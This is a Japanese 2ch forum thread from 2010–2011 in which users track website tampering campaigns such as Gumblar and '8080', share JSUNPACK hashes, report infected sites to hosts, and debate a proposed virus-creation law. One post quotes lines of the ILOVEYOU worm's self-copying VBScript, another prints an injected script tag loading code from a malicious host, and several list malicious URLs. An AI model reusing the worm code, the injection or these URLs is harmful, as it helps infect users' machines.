454 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:56:54.59 ID:qfPgiwgp0
●買うなんて荒らしと一緒だぞ
455 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:50.21 ID:d455Pgrw0
荒らしが運営に喧嘩売っても被害を被るのは巻き添え食らってる人だけっていう…
荒らしたもん勝ち
456 :動け動けウゴウゴ2ちゃんねる:2010/07/10(土) 15:58:54.30 ID:sPPrGi160
荒らしが●を買ったんだとしたら、個人情報登録してるんじゃないのか?
それで同一名義のアカウント全部停止するとか、
新たに買おうとしてきても拒否するというのはできないんだろうか?
胸薄
0687(VдV) ◆yUyb3Tqn92
2011/01/06(木) 11:22:14自分で言うのもなんだけどコテにも耐性ねーだろお前ら
俺様の狙い通りの反応なんだもーん♪(VдV三VдV)だもーん♪
気持ち悪いPCおたくでしかもおっさんなお前らだからしゃーないか(>w<)プクススススwww
0689(VдV) ◆yUyb3Tqn92
2011/01/06(木) 11:30:06∞
8VдV8 !?
0690名無しさん@お腹いっぱい。
2011/01/06(木) 20:52:24ITホワイトボックス2選 脅威ガンブラーウイルスの正体▽感染拡大の謎▽対策は?
0691名無しさん@お腹いっぱい。
2011/01/08(土) 15:54:22http://www.find-job.net/list/j83468.html?from=23
0692名無しさん@お腹いっぱい。
2011/01/12(水) 12:49:48male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
C.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.VBS")
C.Copy(dirwin&"\Win32DLL.vbs")
document.write("<body onload=window();>")
0693名無しさん@お腹いっぱい。
2011/01/12(水) 14:11:100694名無しさん@お腹いっぱい。
2011/01/12(水) 19:25:16http://qb5.2ch.net/test/read.cgi/sec2chd/1294815235/
ソースコード流出の件でウイルスコード等の書き込み制限機能を止めてるんだな
0695/名無しさん[1-30] ◆.htmlint.U
2011/01/13(木) 14:59:340696名無しさん@お腹いっぱい。
2011/01/20(木) 19:53:560697名無しさん@お腹いっぱい。
2011/01/22(土) 12:21:490698/名無しさん[1-30] ◆.htmlint.U
2011/01/23(日) 06:28:39Received 2011-01-19 11:54:20
JSUNPACK
8fa8604f9abcf13ca0abe8775cdad54cad50d4a1
VIRUSTOTAL順番待ち7000番台ってどーよ。。。
0699名無しさん@お腹いっぱい。
2011/01/24(月) 13:26:140700名無しさん@お腹いっぱい。
2011/01/24(月) 14:02:35malware作者が妨害のためにゴミ投げまくったんでしょ
0701神
2011/01/25(火) 14:52:53まぢウイルスかかってみたいんだけどさぁ www
0702名無しさん@お腹いっぱい。
2011/01/25(火) 15:30:56ttp://www.mhlw.go.jp/bunya/kenkou/kekkaku-kansenshou01/index.html
0703名無しさん@お腹いっぱい。
2011/01/25(火) 16:03:051・24学習会 私たちの言論・表現活動の自由が危ない!
すべてのインターネット通信が監視される?
「コンピュータ監視法」とは何か
なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか
法務省は、今通常国会にウィルス作成罪をふくむコンピュータ監視法を提出しようとしています。
共謀罪は法律に違反することを実際に行わなくとも、話しあうだけで処罰するものですが、
コンピュータ監視法の中のウィルス作成罪は、同じようにそれが使用もされていない、ウィルスかどうかもわからないプログラム作成の段階で処罰しようとするものです。
そのためには、インターネットによる私たちの通信のすべてが監視されることになるでしょう。
共謀罪とコンピュータ監視法は、いずれも言論・表現行為の段階で、市民に対する監視を強め、規制しようという狙いで一致しています。
コンピュータ監視法には、捜査当局が裁判所の令状もとらずに、プロバイダーなどにパソコン、
携帯電話のメールやホームページへのアクセスなどの通信履歴を90日間保全要請できるという規定もあります。
コンピュータは現在市民にとって必要不可欠な通信手段となっています。
この法案ができれば、通信の秘密が侵害され、市民の自由な言論・表現
活動が規制されて、民主主義を危うくするでしょう。
学習会で詳しく学び、コンピュータ監視法の国会提出に反対しましょう。お誘いあわせてご参加ください。
■と き 1月24日(月)午後6時30分〜
■ところ かながわ県民センター709号室
(横浜駅西口から徒歩5分、ヨドバシ・カメラ裏)
地図 http://www.pref.kanagawa.jp/osirase/02/0051/center/access.html
■お話し 山下 幸夫さん(弁護士)
「なぜ、ウィルス作成罪・コンピュータ監視法に反対するのか」
■参加費 500円
■主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
ネットワーク反監視プロジェクト Tel.070-5553-549 5
0704名無しさん@お腹いっぱい。
2011/01/25(火) 16:03:45110124コンピュータ監視法学習会
iwakamiyasumi on USTREAM: フリージャーナリスト・岩上安身が、どこにでも出かけて、誰にでも取材し、可能な限り、ダイレクトに情報をお伝えします。インタビュー、対談、記者会見、などなど。. ...
http://www.ustream.tv/channel/iwakamiyasumi
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/
Togetter - 「コンピュータ監視法学習会tudaりまとめ」
http://togetter.com/li/92712
神奈川県横浜市神奈川区鶴屋町2-24-2 - Google マップ - かながわ県民センター
http://maps.google.com/maps?ja&channel=suggest&q=%E7%A5%9E%E5%A5%88%E5%B7%9D%E7%9C%8C%E6%A8%AA%E6%B5%9C%E5%B8%82%E7%A5%9E%E5%A5%88%E5%B7%9D%E5%8C%BA%E9%B6%B4%E5%B1%8B%E7%94%BA2-24-2
第171回国会 議案の一覧
http://www.shugiin.go.jp/itdb_gian.nsf/html/gian/kaiji171.htm
法務省:第163回国会(特別会)提出主要法律案
http://www.moj.go.jp/houan1/houan_houan34.html
法務省を対ウイルス法案で突っついてみました
http://angels-pathway.clanteam.com/qa_houmu_antiviruslaw_100818.html
サイバー犯罪条約
http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
0705名無しさん@お腹いっぱい。
2011/01/25(火) 16:04:31|カテゴリ : 監視社会
執筆 : toshi 2010-1-6 3:32
以下のような学習会を開きます。東京都がネットカフェ規制の強化を条例化しようとするなど自治体レベルでのネット監視がじわじわと進んでいる。
コンピュータ監視法案は共謀罪とともに繰り返し廃案になっているが、共謀罪ほど反対運動の焦点にはなってこなかった。
しかし、民主党政権はとりあえず共謀罪については、法案の提出の動きは見えないが、
コンピュータ監視法案は共謀罪から切り離しての提案もありえないわけではない。油断は禁物というのが現状だということを知ってほしい。
1・25コンピュター監視法学習会のご案内
コンピュータの規制が犯罪対策を理由に年々強化されてきています。こうした
動きを一挙に加速させると考えられているのが、サイバー犯罪条約批准のため
の国内関連法の整備を理由としてだされたコンピュータ監視法です。
コンピュータ監視法の性格は、共謀罪新設法案とともに一体のものとして「刑
法等の一部改正案」としてだされたところに鋭く示されています。
いまやコンピュータは市民の日常生活にとってなくてはならない通信手段です。
サイバー犯罪対策の名の下にコンピュータへの監視・規制を強めようとするコ
ンピュータ監視法の制定を許してはなりません。
同法は、現在共謀罪新設法案とともに廃案となりましたが、法務省などの同法
推進派が条約の批准を理由にいつ上程してくるかはわかりません。
サイバー犯罪条約とは何か、コンピュータ監視法とは何か、学習会を開きます。
ぜひ、ご参加ください。
0706名無しさん@お腹いっぱい。
2011/01/25(火) 16:05:17>>645
と き 1月25日(月)18時40分〜21時
ところ ピープルズ・プラン研究所会議室
(東京都文京区関口1-44-3 信生堂ビル2F
Tel:03-6424-574 8 地下鉄有楽町線江戸川橋駅1B出口徒歩5分)
http://maps.google.co.jp/maps?hl=ja&utm_source=ja-hp
お話し 山下幸夫さん(弁護士)
「サイバー犯罪条約とコンピュータ監視法」
小倉利丸さん(富山大学教員)
「コンピュータ監視法の問題点」
参加費 500円
主 催 盗聴法に反対する市民連絡会
連絡先 日本消費者連盟 Tel.03-5155-476 5
ネットワーク反監視プロジェクト Tel.070-5553-549 5
・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
コメント (0)トラックバック (0)閲覧 (405)
no more capitalism - 1・25コンピュター監視法学習会のご案内
http://alt-movements.org/no_more_capitalism/modules/no_more_cap_blog/details.php?bid=13
東京都文京区関口1-44-3 - Google マップ - 信生堂ビル2F
http://maps.google.com/maps?ja&channel=suggest&q=%E6%9D%B1%E4%BA%AC%E9%83%BD%E6%96%87%E4%BA%AC%E5%8C%BA%E9%96%A2%E5%8F%A31-44-3
0707名無しさん@お腹いっぱい。
2011/01/25(火) 16:07:06日曜日, 1月 23rd, 2011 | Posted by KIMURA
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月)
http://www.ustream.tv/recorded/12218086
ジャーナリスト岩上安身さんのスタッフが生中継を行いました。
流れとしては、
「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」(通称コンピューター監視法)が提出され、
可決を契機に、現在日本は批准していない国際的なテロ防止と称して情報通信を監視する「サイバー犯罪条約」に批准することが考えられ、
さらに批准を契機に盗聴法改正まで行われるのではないかという見解がある。
広く考えると、憲法によって守られている通信の秘密や表現の自由までも国家権力が脅かしうるという、危険な状況で、
さらにこの法改正を理由に憲法の解釈を変えたり、場合によっては憲法改正までもが行われるのではないか、とも言われている。
日弁連を中心にこの「犯罪の国際化及び組織化並びに情報処理の高度化に対処するための刑法等の一部を改正する法律案」を廃案にするための動きが起きている。
もしもこの法改正が進めば、インターネットや携帯電話による市民の情報通信は常に監視されることになるだろう。
警察による通信履歴の検閲や、コンピューター上でのプログラミングすらも、ウィルス作成罪にあたるとして取り締まることが可能になる。
盗聴法<組対法>に反対する市民連絡会では、プライバシーを侵害し、表現の自由を規制する盗聴法の廃止を求める市民団体共同声明に賛同を募っている。 http://www.anti-tochoho.org/ut/ss20100201.html
0708名無しさん@お腹いっぱい。
2011/01/25(火) 16:09:52コンピュータ監視法に対する疑問(盗聴法<組対法>に反対する市民連絡会 )
http://www.anti-tochoho.org/ut/gg20101214.html
サイバー犯罪条約 http://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
日弁連が提出したサイバー犯罪条約への意見書 http://www.nichibenren.or.jp/ja/opinion/report/2004_23.html
【録画配信中】私たちのインターネット通信を監視する「コンピュータ監視法」とは何か1/24(月) | PortSideStation
http://portside-station.net/2011/01/23/6859/
0709名無しさん@お腹いっぱい。
2011/01/25(火) 16:29:41すまない
0710名無しさん@お腹いっぱい。
2011/01/28(金) 16:12:22analyzer5.fc2.com:8080/ana/processor.php?uid=107662
analyzer5.fc2.com:8080/ana/analyzer.php?uid=107662&pid=0&idsess=&ref=&href=http%3A//zbrjinsoul4.web.fc2.com/&wid=1024&hei=1024&col=24&visitor=1-1642776976-1296198419-0-1-1-0
0711名無しさん@お腹いっぱい。
2011/01/28(金) 17:04:370712名無しさん@お腹いっぱい。
2011/01/28(金) 18:13:570713名無しさん@お腹いっぱい。
2011/01/28(金) 19:45:40お前さんがFC2アクセス解析が入っているページ(主にFC2ブログ)にリンクを貼った
↓
そのサイト主がFC2アクセス解析を見てリンクを辿った
↓
それがお前さんのサイトのアクセス解析に残った
そんだけ
鑑定は他でやれ
0714素人
2011/01/31(月) 16:50:340715名無しさん@お腹いっぱい。
2011/01/31(月) 16:52:41感染した感じがしたら、もう掛かってますw
0716名無しさん@お腹いっぱい。
2011/01/31(月) 17:55:26どこからここにたどり着いちゃったの?
素人をアピールすることに何の意味があるの?
ブラウザを見るってのは実行ファイルを見るってこと?
ファイル見ただけじゃ感染しようがないでしょ
0717名無しさん@お腹いっぱい。
2011/02/05(土) 00:27:38www●no-review●net/
Javaスク切った状態でアクセスしてるから異常は無いと思うんでウイルスチェックはしてない。
みんなはどう?
0718名無しさん@お腹いっぱい。
2011/02/05(土) 12:07:100719名無しさん@お腹いっぱい。
2011/02/05(土) 12:12:02そろそろいいの?
0720名無しさん@お腹いっぱい。
2011/02/05(土) 15:07:10いろいろアレだけど
JavaScriptオフで防げないのもあるから注意してね
0721名無しさん@お腹いっぱい。
2011/02/05(土) 18:00:54http://hato.2ch.net/test/read.cgi/news/1296896238/
0722名無しさん@お腹いっぱい。
2011/02/05(土) 19:49:42ソース見たけど1行目からロシア行こうとしててすごくおろロシア
末尾にもあるね
0723/名無しさん[1-30] ◆.htmlint.U
2011/02/05(土) 20:37:36whoisでぬるぽ完了。
0724名無しさん@お腹いっぱい。
2011/02/05(土) 22:17:38消滅じゃなくて戦略的撤退だったのね・・
改竄祭絶賛開催中
isawa-crystal●com/
ソース見てワラタ
0725名無しさん@お腹いっぱい。
2011/02/05(土) 22:27:05ひどすぎて吹いた
danさん経由なのにAviraが怒り出すしひどい
0726/名無しさん[1-30] ◆.htmlint.U
2011/02/06(日) 00:55:38乙
whoisからメルかんりょ
0727名無しさん@お腹いっぱい。
2011/02/09(水) 20:00:55どっとこむ8080装填中
club-garcons●com/
0728/名無しさん[1-30] ◆.htmlint.U
2011/02/09(水) 20:13:00banana3306●maido3●com
う〜む。。。
0729/名無しさん[1-30] ◆.htmlint.U
2011/02/09(水) 21:19:50いちおメルすた。
連絡先がドコダなので蹴られている可能性大。。。
0730名無しさん@お腹いっぱい。
2011/02/09(水) 21:47:050731名無しさん@お腹いっぱい。
2011/02/25(金) 21:01:47.730732/名無しさん[1-30] ◆.htmlint.U
2011/02/27(日) 07:12:12.150733/名無しさん[1-30] ◆.htmlint.U
2011/03/04(金) 15:22:19.35JSUNPACK
6e2cf8ebd8635107d4e26b2861c3a26cf4073e14
0734名無しさん@お腹いっぱい。
2011/03/07(月) 19:28:14.33ttp://minkara.carview.co.jp/userid/361321/blog/21640486/
ttp://minkara.carview.co.jp/userid/361321/blog/21668229/
【セキュリティの強化】って、具体的に何をすれば良いのかブログ書いてくれよw
0735/名無しさん[1-30] ◆.htmlint.U
2011/03/07(月) 22:01:29.92こりか。。。
壁紙を変更する偽セキュリティソフト、国内で感染報告が増える
http://internet.watch.impress.co.jp/docs/news/20110307_431684.html
http://jp.trendmicro.com/jp/threat/security_news/monthlyreport/article/20110304050209.html
0736名無しさん@お腹いっぱい。
2011/03/08(火) 00:50:39.79自分で燃料投下して逆ギレとか、どんだけバカなんだよwwww
0737!ninja
2011/03/08(火) 01:05:54.250738名無しさん@お腹いっぱい。
2011/03/08(火) 19:52:44.78>たぶん、セキュリティがちょっと低く設定されていたか
>JAVAが最新でなかったのが原因で入り込まれたとか考えられるそうです。
>ウイルスバスターも強制終了ww
>エ○サイトのURLはLunascapeに登録していたので消えましたがww
ユーザーのセキュリティー意識が低ければ
糞の役にも立たないウイルスバスターにワロタ
0739名無しさん@お腹いっぱい。
2011/03/09(水) 00:39:18.08それはなんでも同じじゃね
ユーザーが全て許可をしてしまえばおしまい
0740名無しさん@お腹いっぱい。
2011/03/09(水) 10:52:52.72アメーバピグのFlashのバージョンアップで運営ブログが炎上したのだって
未だに平気でVer9を使っている連中が原因だぞ。
0741名無しさん@お腹いっぱい。
2011/03/09(水) 13:38:09.41ウイルスバスターは、低次元な広告を見てもアホユーザーがメイン対象にもかかわらず
そのアホユーザーには効果がないなら、存在が無意味だろうし
アホユーザー前提に設計したほうがいいと思うのよね。
許可するシーンで
例のヤクザ坊主が出てきて、しつこく何度も脅すとか
例の女が発狂しているシーンが出てきて、JAVAのアップデートを促すとかw
0742名無しさん@お腹いっぱい。
2011/03/09(水) 13:56:52.091:「○○(セキュリティソフト)を入れてるから大丈夫」と豪語している
2:全てをセキュリティソフトに依存しているため、
地雷(DBD)を踏むと高確率で感染する
3:「○○入れてたのに感染した(怒)」と、セキュリティソフトに文句を言う
4:必死になって駆除方法を捜して駆除は行うが、
感染原因を知ろうとしない為、根本的な対策ができない(駆除方法と一緒に書いてあっても一切見ない)
5:2に戻る
セキュリティソフト依存症は病気(精神疾患)ですよw
0743名無しさん@お腹いっぱい。
2011/03/09(水) 17:41:16.81セキュリティソフトも偶然入ってるだけで場合によっては期限切れ
>>741
たしかにそうだね
たとえ誤爆してでも初心者ユーザーには選択肢を与えないほうがきっと安全
バスターが把握していないものは許可しないとかそういうモードをつけてもいいかもしれない
どうせ初心者なら使うソフトも限られてるだろうし
0744名無しさん@お腹いっぱい。
2011/03/11(金) 11:02:19.25http://raicho.2ch.net/test/read.cgi/newsplus/1299802224/
これからは故意でなくても脆弱性を修正しないで放置して
Gumblarようなウィルスの踏み台にされた時点で逮捕されるわけだな。
0745名無しさん@お腹いっぱい。
2011/03/11(金) 14:20:44.45>作成罪に加え、提供、取得、保管などの罪を新設。
マルウェアの取得が違法
↓
ベンダーに検体が提出されない
↓
極地的に流行るマルウェアに対応できず、感染PCが急増
↓
感染したPCを所有する者は容赦無く逮捕
↓
罰金(30万円以下)と、証拠品として押収したPC(クリーニングされた後、中古品として販売)でガッツリ稼ぐ
さすが欠管政権w
穴だらけなのに隙が無いなwwww
0746名無しさん@お腹いっぱい。
2011/03/11(金) 14:36:33.59他人のPCを感染させる目的の場合らしいよ
0747名無しさん@お腹いっぱい。
2011/03/12(土) 20:03:44.23辞民党は何もしてこなかったけどなwwww
0748名無しさん@お腹いっぱい。
2011/03/12(土) 21:00:22.21法案自体は,2004年2月の第159回国会で閣法(内閣提出法案)として国会に提出されました。
とあるので、何もしてこなかった訳ではないらしい
ウイルス作成罪はいつになったら成立するのか
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20061201/255707/
0749名無しさん@お腹いっぱい。
2011/03/12(土) 21:50:09.09ttp://www.nikkei.com/news/headline/article/g=96958A9C93819481E3E3E2E2EB8DE3E3E2E1E0E2E3E3E2E2E2E2E2E2
> ウイルスの取得や保管も罪になり、2年以下の懲役または30万円以下の罰金。
> 対策ソフトの開発などが処罰対象とならないよう、
> 処罰の要件に「正当な理由なく」との表現を盛り込んだ。
> ウイルス作成罪創設の改正案提出は自公政権当時から3回目。
0750名無しさん@お腹いっぱい。
2011/03/13(日) 09:41:52.460751/名無しさん[1-30] ◆.htmlint.U
2011/03/22(火) 12:00:31.99http://www.adobe.com/jp/software/flash/about/
0752名無しさん@お腹いっぱい。
2011/03/25(金) 16:02:11.01すまない、いったいどんなソースコードがあったんだ?
0753名無しさん@お腹いっぱい。
2011/03/25(金) 22:14:50.02だいたいいつものやつだよ
0754名無しさん@お腹いっぱい。
2011/03/30(水) 23:33:49.13ttp://ruhuraro.blog57.fc2.com/
>このページの表示は許可されていません
>このブログは下記の理由などにより凍結されています。
>* 規約上の違反があった
>* 多数のユーザーに迷惑をかける行為を行った。
震災の記事の件で通報したら消滅すたw
0755名無しさん@お腹いっぱい。
2011/03/31(木) 00:24:26.39http://megalodon.jp/2011-0322-0049-18/ruhuraro.blog57.fc2.com/blog-entry-347.html
これか?
0756名無しさん@お腹いっぱい。
2011/03/31(木) 00:44:25.75こりゃ凍結されても仕方ないわw
0757名無しさん@お腹いっぱい。
2011/03/31(木) 08:30:55.71閲覧を観覧と書いちゃう男の人って…
0758名無しさん@お腹いっぱい。
2011/04/03(日) 01:24:43.57ttp://ameblo●jp/ruhuraro/entry-10847321466●html
>(VДV)┌ んなことよりfc2でやってる俺様ブログがなぜか凍結されたぜ
>l(VДV)l一体、この俺様が何をしたというのかあぁぁぁぁああああ!!!!
>(VдV )震災をネタにしすぎたかしらん♪ちょっぴ反省w
反省しなくて良いからさっさと氏ねよ
0759名無しさん@お腹いっぱい。
2011/04/03(日) 01:40:21.620760名無しさん@お腹いっぱい。
2011/04/05(火) 00:12:59.51http://hatsukari.2ch.net/test/read.cgi/news/1301929633/
0761名無しさん@お腹いっぱい。
2011/04/05(火) 19:55:11.97http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2539
0762名無しさん@お腹いっぱい。
2011/04/05(火) 23:15:33.130763名無しさん@お腹いっぱい。
2011/04/06(水) 14:23:29.81al[BLOCKED]ne.com/ur.php
al[BLOCKED]er.com/ur.php
li[BLOCKED]on.com/ur.php
t6[BLOCKED]56.info/ur.php
http://hibari.2ch.net/test/read.cgi/sec/1279692828/
0765/名無しさん[1-30] ◆.htmlint.U
2011/04/16(土) 07:50:25.1310.2.159.1
0767名無しさん@お腹いっぱい。
2011/04/30(土) 20:12:14.26無菌状態にしようとするからいたちごっこになる
ゾンビの体でなにが来ても復活できるようにすれば問題なくなる。
仮想環境はもっと使いやすく作れるだろに
セキュリティ産業をすぐにすたれさすのはもったいないと言って
作らない。
0768/名無しさん[1-30] ◆.htmlint.U
2011/05/13(金) 12:34:28.5710.3.181.14
http://www.jpcert.or.jp/at/2011/at110013.txt
0769名無しさん@お腹いっぱい。
2011/05/14(土) 08:19:11.140770/名無しさん[1-30] ◆.htmlint.U
2011/05/15(日) 02:39:19.30> MySQLdb error
orz...........
0771名無しさん@お腹いっぱい。
2011/05/15(日) 12:36:18.690772/名無しさん[1-30] ◆.htmlint.U
2011/05/29(日) 00:05:27.61今流行のSEOポイズニングっての突っ込んだら固まったお。。。
0773名無しさん@お腹いっぱい。
2011/05/29(日) 12:10:45.960774名無しさん@お腹いっぱい。
2011/05/29(日) 21:30:56.480775/名無しさん[1-30] ◆.htmlint.U
2011/05/29(日) 21:32:20.44も少し待つやうにすんべさ。
0776/名無しさん[1-30] ◆.htmlint.U
2011/05/29(日) 21:33:27.36>>774
なんぞなもし。
0777/名無しさん[1-30] ◆.htmlint.U
2011/06/03(金) 00:39:09.0610.3.181.16
* IEのみ
0778/名無しさん[1-30] ◆.htmlint.U
2011/06/06(月) 13:19:58.16IE 10.3.181.23
Fx 10.3.181.22
0779名無しさん@お腹いっぱい。
2011/06/07(火) 02:34:32.29ここの >>937 見てみ
香ばしさいっぱいだからwww
0780名無しさん@お腹いっぱい。
2011/06/07(火) 08:17:42.630781名無しさん@お腹いっぱい。
2011/06/07(火) 13:14:39.91専ブラ使うといいよ
0782/名無しさん[1-30] ◆.htmlint.U
2011/06/08(水) 19:55:08.34http://www.jpcert.or.jp/at/2011/at110015.txt
0783/名無しさん[1-30] ◆.htmlint.U
2011/06/16(木) 01:28:41.58http://www.jpcert.or.jp/at/2011/at110017.html
http://www.jpcert.or.jp/at/2011/at110018.html
http://www.jpcert.or.jp/wr/2011/wr112201.html
>>751
10.3.181.26
0784名無しさん@お腹いっぱい。
2011/06/21(火) 13:45:48.23ttp://blog.armorize.com/2011/06/mass-meshing-injection-sidenamejs.html
ttp://www.google.co.jp/search?q=%22script+src%3D%22+sidename.js
まぁ誘導先も正規サイトで組まれているってのは
既にGumblar.xが通った道なので
Armorizeが主張するほど革新的な物ではない気がする
0785名無しさん@お腹いっぱい。
2011/06/28(火) 23:20:33.240787名無しさん@お腹いっぱい。
2011/07/27(水) 03:51:53.64むしろ流行を終えて定着した
0788名無しさん@お腹いっぱい。
2011/07/27(水) 12:15:38.09http://www.securebrain.co.jp/about/news/2011/07/gred-report24.html
0789名無しさん@お腹いっぱい。
2011/07/31(日) 00:50:08.30www●hotel-socatel●be/
釣りに使った場合・・違法になるかどうかはしらん
0790名無しさん@お腹いっぱい。
2011/07/31(日) 23:20:35.75今の状況は
Gumblar.xは去年から停止中
8080は一部サイトで不審なコードが定期的に追加される状態が起こってる感じ
>>789
うさんくさいサイトのようだけど
トップページには特に不審なコードはないように思うん
0791名無しさん@お腹いっぱい。
2011/08/01(月) 02:04:29.960792名無しさん@お腹いっぱい。
2011/08/01(月) 02:10:32.21偽アンチウィルスソフト配布してるぞ
0793/名無しさん[1-30] ◆.htmlint.U
2011/08/01(月) 22:44:56.11>>791
おしんにつーほ。
>>792
404
0794名無しさん@お腹いっぱい。
2011/08/01(月) 23:49:09.52ccドメインのexploitコードを食わされるパターン
0795名無しさん@お腹いっぱい。
2011/08/02(火) 00:05:28.87難読化されてるタイプでやっぱりccドメインから
0796/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 00:13:11.63>>794
こちらの環境だと*.cu.ccより先に逝けない。。。
>>795
あとでみゆ
0797/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 00:16:30.23アクセスログとってるのか?
0798名無しさん@お腹いっぱい。
2011/08/02(火) 00:19:36.11ロシア系?exploitキットのドロップゾーン
404とか嘘ついてんじゃないよ
0799名無しさん@お腹いっぱい。
2011/08/02(火) 00:26:36.83jpドメインをつかって他国の人間をターゲットにするんかいな
0800/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 00:31:55.04過去ログにその解説があったはずぅー。>>31-32かな。
0801/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 00:52:46.26踏み台とか結構あったよ>>799
0802名無しさん@お腹いっぱい。
2011/08/02(火) 01:14:57.81儲からんし、めんどくさいんだろうなあ
0803/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 02:36:14.60おくた。
>>795
デジロにつーほ。
でもデジロは遅いので、どなたかふぇーすぶっくから教えてあげてくらはい。。。
>>798
みてみゆ。。。
眠い。
0804/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 03:19:16.930805/名無しさん[1-30] ◆.htmlint.U
2011/08/02(火) 03:41:19.34とりあえずさくらにつーほ。
あきたねる
0806名無しさん@お腹いっぱい。
2011/08/03(水) 07:24:27.95ccドメインから旅にでます
http://www●e1homes●jp/
おおなつかしいタイプ ロシアに行こう
0807名無しさん@お腹いっぱい。
2011/08/03(水) 07:42:31.52http://www●momohime-medical●com/~momohime/deary82●html
http://www●passo-co●jp/~passocojp/lean77●html
両方とも同じグループに属してる?踏み台 薬を売ってくれるサイトに誘導してた痕跡がある
0808名無しさん@お腹いっぱい。
2011/08/03(水) 19:05:28.940809オルティス・ジャパン
2011/08/03(水) 19:36:44.04サイバー犯罪対策課に通報済
0810名無しさん@お腹いっぱい。
2011/08/03(水) 20:36:25.26それは去年の8080の時のものです
その踏み台リンクと画像(deary82.jpg、lean77.jpg)をのせたメールをボットマシンで配信してた
0811/名無しさん[1-30] ◆.htmlint.U
2011/08/03(水) 23:29:37.81>>806-807
おちゅ
つーほーしました。
0812名無しさん@お腹いっぱい。
2011/08/04(木) 10:31:07.900813名無しさん@お腹いっぱい。
2011/08/04(木) 22:41:17.10今話題の通販系にインジェクションしちゃうタイプ
0814/名無しさん[1-30] ◆.htmlint.U
2011/08/04(木) 23:17:56.96これからみゆお。
また蹴られてる*.えう
orz....
0815/名無しさん[1-30] ◆.htmlint.U
2011/08/05(金) 00:14:57.79おちゅ
ど〜ん
0816名無しさん@お腹いっぱい。
2011/08/12(金) 08:40:44.69去年は動いてたようなやつ
ロシアから直接.jsがやってきてたようだ
0817/名無しさん[1-30] ◆.htmlint.U
2011/08/12(金) 15:39:24.34お疲れ様です。
さくらにつーほ。
0818名無しさん@お腹いっぱい。
2011/08/26(金) 03:22:41.51「osCommerce」の脆弱性を利用したウェブサイトの改ざん被害が拡大 セキュアブレインが『gred セキュリティサービス』『gredでチェック』で対応
http://www.securebrain.co.jp/about/news/2011/08/oscommerce.html
0819/名無しさん[1-30] ◆.htmlint.U
2011/08/26(金) 07:51:45.81もう、メンドイので直リン
http://hibari.2ch.net/test/read.cgi/win/1305730772/5
0820名無しさん@お腹いっぱい。
2011/09/06(火) 12:35:37.34うん
ttp://jsunpack.jeek.org/dec/go?report=a2b5afc3cdb263167efc5ea36747d128f0921f6d
<title>SELECTION</title><script src=http://exero●eu/catalog/jquery.js></script><title></title>
http://exero●eu/をググると感染サイトがゴロゴロしてるな
0821名無しさん@お腹いっぱい。
2011/09/08(木) 05:01:18.67このディレクトリすごく臭いです。
例えば/shop/es.txt??とか
C&Cサーバっぽいことになってるのかな
0822名無しさん@お腹いっぱい。
2011/09/08(木) 05:15:59.590823名無しさん@お腹いっぱい。
2011/09/08(木) 05:34:34.77これだけだと問題なさそうだけど
こいつをつけるとwolve●html
害はなさそうだけど、アレなページに飛ぶようだ
こういう会社なんだろうか
0824名無しさん@お腹いっぱい。
2011/09/13(火) 19:43:13.580825名無しさん@お腹いっぱい。
2011/09/19(月) 18:12:05.45症状が全く同じもののPCを持っていますが、本来ある場所にあるはずのmidi9がありません。
0826名無しさん@お腹いっぱい。
2011/09/19(月) 18:23:15.47スレ汚し失礼しました
0827名無しさん@お腹いっぱい。
2011/09/19(月) 21:28:46.92あるとおもうよ
そういう調べ方はやめたほうがいい
0828名無しさん@お腹いっぱい。
2011/09/24(土) 19:03:28.86www●dinsuceava●roがアレですかね・・・
0829八頭 ◆YAGApwSaEw
2011/09/24(土) 20:59:42.03ですね~
Google セーフ ブラウジング診断 より
疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 2 回検出されています。
このサイトで過去 90 日間に Google がテストした 92 ページのうち 23 ページで、
ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは 2011-09-23 で、このサイトで不審なコンテンツが最後に検出されたのは 2011-09-23 です。
不正なソフトウェアには 24 trojan(s) などがあります。感染先のコンピュータで平均 4 個のプロセスが新たに発生しています。
Online Link Scan (AVG・Google・SiteTruth・PhisTank) ・・・ 未検出
セキュアブレイン gred ・・・ 未検出orz(通報済み)
シマンテック ・・・ 未検出orz(通報済み)
0830/名無しさん[1-30] ◆.htmlint.U
2011/09/24(土) 22:12:07.21>>828
リロードしたらスクリプト消えたん。
>>829
乙です。
とりあえずJSUNPACKにスクリプトかけてみたお。(その間に対応されてた。)
407f4efb5e405a90d8aee230d5676eb4b3b795a6
0831八頭 ◆YAGApwSaEw
2011/09/24(土) 22:42:46.61茨●県を放送対象地域とする中波(AM)放送局を保有する
基幹放送局提供事業者である
株式会社IBSの設備を利用してラジオ放送を行っている。
茨●方面、他にもあるかもよ
roはルーマニアのドメインだね
0832/名無しさん[1-30] ◆.htmlint.U
2011/09/24(土) 23:35:49.05VTいきなり死んだ。。。orz.........
0834/名無しさん[1-30] ◆.htmlint.U
2011/09/25(日) 00:00:31.68八頭さん、コテハンさん、夷塚さんをはじめとするコテの方々、名無しのみなさんに比べればまだまだです。
なによりもお伝えいただいた828さんに感謝です。
0835名無しさん@お腹いっぱい。
